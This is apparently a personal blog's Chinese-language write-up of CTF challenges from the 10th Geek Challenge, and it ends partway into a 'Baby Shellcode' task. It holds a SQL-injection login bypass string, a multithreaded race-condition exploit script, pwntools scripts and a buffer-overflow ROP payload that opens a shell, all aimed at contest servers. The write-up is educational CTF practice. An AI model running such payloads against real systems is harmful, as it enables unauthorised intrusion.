<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/1.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/1.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/1.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Contest,">





  <link rel="alternate" href="/atom.xml" title="IFpop" type="application/atom+xml">






<meta name="description" content="Web打比赛前先撸一只猫！ 直接传参： http://118.25.14.40:8110/?cat=dog 得到flag:    Syc{I_actu4l1y_Lik3_d0gs} 你看见过我的菜刀么flag:Syc{Such_a_cl3ar_b0y} BurpSuiiiiiit!!!flag：Syc{BurpExtender_Are_guns_F0r_Hack3rs} Easysql 简单sql">
<meta name="keywords" content="Contest">
<meta property="og:type" content="article">
<meta property="og:title" content="第十届极客大挑战">
<meta property="og:url" content="https://IFpop.github.io/2019/10/15/第十届极客大挑战/index.html">
<meta property="og:site_name" content="IFpop">
<meta property="og:description" content="Web打比赛前先撸一只猫！ 直接传参： http://118.25.14.40:8110/?cat=dog 得到flag:    Syc{I_actu4l1y_Lik3_d0gs} 你看见过我的菜刀么flag:Syc{Such_a_cl3ar_b0y} BurpSuiiiiiit!!!flag：Syc{BurpExtender_Are_guns_F0r_Hack3rs} Easysql 简单sql">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1570884161363.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1570885264721.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1570886658327.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1570881352341.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1571116889883.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1571117464875.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1571209342577.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1571209369313.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1570889802327.png">
<meta property="og:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1571318090417.png">
<meta property="og:updated_time" content="2019-10-20T15:54:47.453Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="第十届极客大挑战">
<meta name="twitter:description" content="Web打比赛前先撸一只猫！ 直接传参： http://118.25.14.40:8110/?cat=dog 得到flag:    Syc{I_actu4l1y_Lik3_d0gs} 你看见过我的菜刀么flag:Syc{Such_a_cl3ar_b0y} BurpSuiiiiiit!!!flag：Syc{BurpExtender_Are_guns_F0r_Hack3rs} Easysql 简单sql">
<meta name="twitter:image" content="https://ifpop.github.io/2019/10/15/第十届极客大挑战/1570884161363.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://IFpop.github.io/2019/10/15/第十届极客大挑战/">





  <title>第十届极客大挑战 | IFpop</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a href="https://github.com/IFpop" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; left: 0; transform: scale(-1, 1);" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style></a>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">IFpop</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Stay Hungry, Stay Foolish</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://IFpop.github.io/2019/10/15/第十届极客大挑战/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="IFpop">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="IFpop">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">第十届极客大挑战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-10-15T19:49:59+08:00">
                2019-10-15
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 浏览
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  2.8k 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  14 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body " itemprop="articleBody">

      
      

      
        <h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="打比赛前先撸一只猫！"><a href="#打比赛前先撸一只猫！" class="headerlink" title="打比赛前先撸一只猫！"></a>打比赛前先撸一只猫！</h2><p><img src="/2019/10/15/第十届极客大挑战/1570884161363.png" alt="1570884161363"></p>
<p>直接传参：</p>
<p><code>http://118.25.14.40:8110/?cat=dog</code></p>
<p>得到flag:    <code>Syc{I_actu4l1y_Lik3_d0gs}</code></p>
<h2 id="你看见过我的菜刀么"><a href="#你看见过我的菜刀么" class="headerlink" title="你看见过我的菜刀么"></a>你看见过我的菜刀么</h2><p><code>flag:Syc{Such_a_cl3ar_b0y}</code></p>
<h2 id="BurpSuiiiiiit"><a href="#BurpSuiiiiiit" class="headerlink" title="BurpSuiiiiiit!!!"></a>BurpSuiiiiiit!!!</h2><p><code>flag：Syc{BurpExtender_Are_guns_F0r_Hack3rs}</code></p>
<h2 id="Easysql"><a href="#Easysql" class="headerlink" title="Easysql"></a>Easysql</h2><p><img src="/2019/10/15/第十届极客大挑战/1570885264721.png" alt="1570885264721"></p>
<p>简单sql注入，试试万能密码：<br>用户名：<code>admin&#39; or &#39;1&#39;=&#39;1&#39; or &#39;1&#39;=&#39;1&#39; #</code></p>
<p>密码随意</p>
<p>得到<code>Syc{sqL_inj3cti0n_1s_re4lly_fUn}</code></p>
<h2 id="性感潇文清，在线算卦"><a href="#性感潇文清，在线算卦" class="headerlink" title="性感潇文清，在线算卦"></a>性感潇文清，在线算卦</h2><p><img src="/2019/10/15/第十届极客大挑战/1570886658327.png" alt="1570886658327"></p>
<p>查看源码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">  &lt;!DOCTYPE html&gt;  </span><br><span class="line">  &lt;html lang=<span class="string">"en"</span>&gt;  </span><br><span class="line">  &lt;head&gt;  </span><br><span class="line">      &lt;meta charset=<span class="string">"UTF-8"</span>&gt;  </span><br><span class="line">      &lt;title&gt;Ayrain&lt;/title&gt;  </span><br><span class="line">     &lt;link rel=<span class="string">"stylesheet"</span> type=<span class="string">"text/css"</span> href=<span class="string">"123.css"</span>/&gt;  </span><br><span class="line">  &lt;/head&gt;  </span><br><span class="line">  &lt;body&gt;  </span><br><span class="line">     &lt;div id=<span class="string">"login"</span>&gt;  </span><br><span class="line">         &lt;h4&gt;性感潇文清在线算卦&lt;/h4&gt;  </span><br><span class="line">         &lt;form method=<span class="string">"get"</span>&gt;  </span><br><span class="line">             &lt;input type=<span class="string">"text"</span> required=<span class="string">"required"</span> placeholder=<span class="string">"your name"</span> name=<span class="string">"u"</span>&gt;&lt;/input&gt;  </span><br><span class="line">             &lt;input type=<span class="string">"password"</span> required=<span class="string">"required"</span> placeholder=<span class="string">"your birthday"</span> name=<span class="string">"p"</span>&gt;&lt;/input&gt;  </span><br><span class="line">             &lt;button class="but" type="submit"&gt;算一卦！&lt;/button&gt;  </span><br><span class="line">         &lt;/form&gt;  </span><br><span class="line">     &lt;/div&gt;  </span><br><span class="line"> &lt;/body&gt;  </span><br><span class="line"> &lt;/html&gt; </span><br><span class="line">&lt;!--$savepath = <span class="string">"uploads/"</span> . sha1($_SERVER[<span class="string">'REMOTE_ADDR'</span>]) . <span class="string">"/"</span>;</span><br><span class="line">    <span class="keyword">if</span> (!is_dir($savepath)) &#123;</span><br><span class="line">        $oldmask = umask(<span class="number">0</span>);</span><br><span class="line">        mkdir($savepath);</span><br><span class="line">        umask($oldmask);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ((@$_GET[<span class="string">'u'</span>]) &amp;&amp; (@$_GET[<span class="string">'p'</span>])) &#123;</span><br><span class="line">        $content = <span class="string">'***************'</span>;</span><br><span class="line">        file_put_contents(<span class="string">"$savepath"</span> . sha1($_GET[<span class="string">'u'</span>]), $content);</span><br><span class="line">        $msg = <span class="string">'Ding!你的算卦结果就在这儿啦！ '</span> . $savepath . htmlspecialchars(sha1($_GET[<span class="string">'u'</span>])) . <span class="string">""</span>;</span><br><span class="line">        <span class="keyword">echo</span> $msg;</span><br><span class="line">        usleep(<span class="number">100000</span>);</span><br><span class="line">        @$content = <span class="string">"you are too slow"</span>;</span><br><span class="line">        file_put_contents(<span class="string">"$savepath"</span> . sha1($_GET[<span class="string">'u'</span>]), $content);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">试试条件竞争吧？</span><br><span class="line">--!&gt;</span><br></pre></td></tr></table></figure>
<p>先学一下条件漏洞先：</p>
<p>条件竞争漏洞是一种服务器端的漏洞，由于服务器端在处理不同用户的请求时是并发进行的，因此，如果并发处理不当或相关操作逻辑顺序设计的不合理时，将会导致此类问题的发生。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://148.70.59.198:42534/?u=1&amp;p=1"</span></span><br><span class="line"></span><br><span class="line">u = <span class="string">"http://148.70.59.198:42534/uploads/4380dd7bb88ea8bc28acb3f48a4876b857062618/"</span> + hashlib.sha1(<span class="string">b'1'</span>).hexdigest()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getflag</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">50</span>):</span><br><span class="line">            requests.get(url)</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">50</span>):</span><br><span class="line">            res = requests.get(u)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">"slow"</span> <span class="keyword">not</span> <span class="keyword">in</span> res.text:</span><br><span class="line">                print(res.text)</span><br><span class="line">threads = <span class="number">25</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(threads):</span><br><span class="line">        t = threading.Thread(target=getflag)</span><br><span class="line">        t.start()</span><br><span class="line">        </span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(threads):</span><br><span class="line">        t.join()</span><br></pre></td></tr></table></figure>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h2><p><code>Syc{w3lc0me_t0_th3_10th_geek!}</code></p>
<h2 id="啊啊啊啊啊啊啊！！！我好兴奋！！！"><a href="#啊啊啊啊啊啊啊！！！我好兴奋！！！" class="headerlink" title="啊啊啊啊啊啊啊！！！我好兴奋！！！"></a>啊啊啊啊啊啊啊！！！我好兴奋！！！</h2><p><img src="/2019/10/15/第十届极客大挑战/1570881352341.png" alt="1570881352341"></p>
<p>这个我觉得很有问题，别人说直接在winhex中可以看到，但我这看不见</p>
<p><code>Syc{Do_You_know_Ayrain}</code></p>
<h2 id="散打黑客的压缩包"><a href="#散打黑客的压缩包" class="headerlink" title="散打黑客的压缩包"></a>散打黑客的压缩包</h2><blockquote>
<p>我拼着生命危险从散打黑客的电脑里偷来的压缩包，大家快跟我一起破解开。看看藏着什么东西。</p>
</blockquote>
<p>下载下来有一个压缩包，被加密了，使用暴力破解，得到密码为：3130</p>
<p>随后解压，得到另外一个压缩包，还是被加密了，同样用工具进行解密，得到密码7665</p>
<p>解压后，得到一个txt文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">好吧，其实我已经提前破解掉了。</span><br><span class="line">由于看到了散打黑客的秘密，我感觉我迟早要被灭口。</span><br><span class="line">为了让我发现的秘密能够安全传给下一个人，我决定把这个秘密用数字的方式藏起来。</span><br><span class="line">（这个秘密是关于散打黑客的一件特别想要拥有的东西）</span><br><span class="line">什么？你不想知道散打黑客秘密，你只想要flag？</span><br><span class="line">哎呀，别急嘛。先听我说完，flag会有的。</span><br><span class="line">第一个找到我藏起来的散打黑客想要的东西。</span><br><span class="line">并且截图发给我的geeker，我请ta豁奶茶！</span><br><span class="line">校外的师傅我给你点外卖！</span><br><span class="line">（截了图却找不到我的qq号？那就很可惜了23333）</span><br><span class="line">咳咳，我的话说完了。去最下面拿你的flag吧少年！！！</span><br></pre></td></tr></table></figure>
<p>得到<code>Syc{Weak_passwd_are_DANGER0us}</code></p>
<h2 id="是谁杀了谁"><a href="#是谁杀了谁" class="headerlink" title="是谁杀了谁"></a>是谁杀了谁</h2><blockquote>
<p>注意自己的HP，别被气死了。</p>
</blockquote>
<h1 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h1><h2 id="Find-tools"><a href="#Find-tools" class="headerlink" title="Find tools"></a>Find tools</h2><blockquote>
<p> Find right tools，so easy！<code>nc pwnto.fun 9999</code></p>
</blockquote>
<p>打开连接，看到：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Hi boys, this game may be  a new things <span class="keyword">for</span> u.                        </span><br><span class="line">Have fun! I think U will love it! So fun, so easy!                    </span><br><span class="line">The key is :        <span class="comment">#此处停顿了一下，可能有输出                                                  </span></span><br><span class="line">pwntools is a good tool to complete the game!                         </span><br><span class="line">Can U get password?                                                   </span><br><span class="line">Input your password:</span><br></pre></td></tr></table></figure>
<p><strong>题目说<code>find tools</code>，里面说pwntools是好工具，现在就可以写脚本捕获输出</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">"debug"</span></span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">"pwnto.fun"</span>, <span class="number">9999</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">"The key is :\n"</span>)</span><br><span class="line">str = io.recvuntil(<span class="string">"\rpwntools"</span>)</span><br><span class="line"><span class="comment">#bDF2ZV9sMG5nX2FuZF9wd24=</span></span><br><span class="line"><span class="comment">#l1ve_l0ng_and_pwn</span></span><br><span class="line">io.recv()</span><br></pre></td></tr></table></figure>
<p>现在就得到一段字符串，发现是<code>base64</code>加密，这个就是password，输入password，<code>getflag</code></p>
<p>完整脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">"debug"</span></span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">"pwnto.fun"</span>, <span class="number">9999</span>)</span><br><span class="line"><span class="comment">#bDF2ZV9sMG5nX2FuZF9wd24=</span></span><br><span class="line"><span class="comment">#l1ve_l0ng_and_pwn</span></span><br><span class="line">io.recvuntil(<span class="string">"The key is :\n"</span>)</span><br><span class="line">str = io.recvuntil(<span class="string">"\rpwntools"</span>)</span><br><span class="line">str = base64.b64decode(str)</span><br><span class="line">io.recv()</span><br><span class="line"></span><br><span class="line">io.send(str)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<p>得到<code>flag:Syc{pwn_1s_s0_fun}</code></p>
<h2 id="Baby-rop"><a href="#Baby-rop" class="headerlink" title="Baby rop"></a>Baby rop</h2><p>下载文件分析一下安全设置：</p>
<p><img src="/2019/10/15/第十届极客大挑战/1571116889883.png" alt="1571116889883"></p>
<p>没有打开栈溢出保护，用ida64打开看看源程序：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 v4; <span class="comment">// [rsp+0h] [rbp-88h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(msg);</span><br><span class="line">  <span class="built_in">puts</span>(txt);</span><br><span class="line">  read(<span class="number">0</span>, &amp;v4, <span class="number">0x100</span>uLL);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(msa);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>存在read函数，所以可以考虑进行栈溢出,查看.data表</p>
<p><img src="/2019/10/15/第十届极客大挑战/1571117464875.png" alt="1571117464875"></p>
<p>由于是静态地址，所以直接使用相应地址,但传参还是使用ROP链进行传参</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">╰─○ ROPgadget --binary ./hello --only <span class="string">"pop|ret"</span></span><br><span class="line">Gadgets information</span><br><span class="line">============================================================</span><br><span class="line">0x000000000040068c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x000000000040068e : pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x0000000000400690 : pop r14 ; pop r15 ; ret</span><br><span class="line">0x0000000000400692 : pop r15 ; ret</span><br><span class="line">0x000000000040068b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x000000000040068f : pop rbp ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x0000000000400520 : pop rbp ; ret</span><br><span class="line">0x0000000000400693 : pop rdi ; ret  <span class="comment">#可用</span></span><br><span class="line">0x0000000000400691 : pop rsi ; pop r15 ; ret</span><br><span class="line">0x000000000040068d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x0000000000400451 : ret</span><br></pre></td></tr></table></figure>
<p>找到一个rdi可用，脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = remote(<span class="string">"nc pwnto.fun"</span>,<span class="number">10000</span>)</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x88</span>+<span class="string">'a'</span>*<span class="number">0x8</span>+p64(<span class="number">0x06010AE</span>)</span><br><span class="line">sh.send(payload)</span><br><span class="line">sh.interactive()</span><br><span class="line">sh.close()</span><br></pre></td></tr></table></figure>
<p>得到<code>flag:Syc{S0_easy_and_S0_good}</code></p>
<h2 id="Baby-Shellcode"><a href="#Baby-Shellcode" class="headerlink" title="Baby Shellcode"></a>Baby Shellcode</h2><blockquote>
<p>打<code>CSGO</code>，它不香吗？<code>P90 rush b, let&#39;s go.</code></p>
</blockquote>
<p><code>checksec</code>一下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Full RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>
<p>开启了<code>Full RELRO</code>，无法修改<code>got</code>表，<code>NX保护开启</code>，也就是栈中数据不能执行，可以尝试使用<code>rop</code>进行绕过</p>
<p>用<code>ida</code>打开，查看main函数：</p>
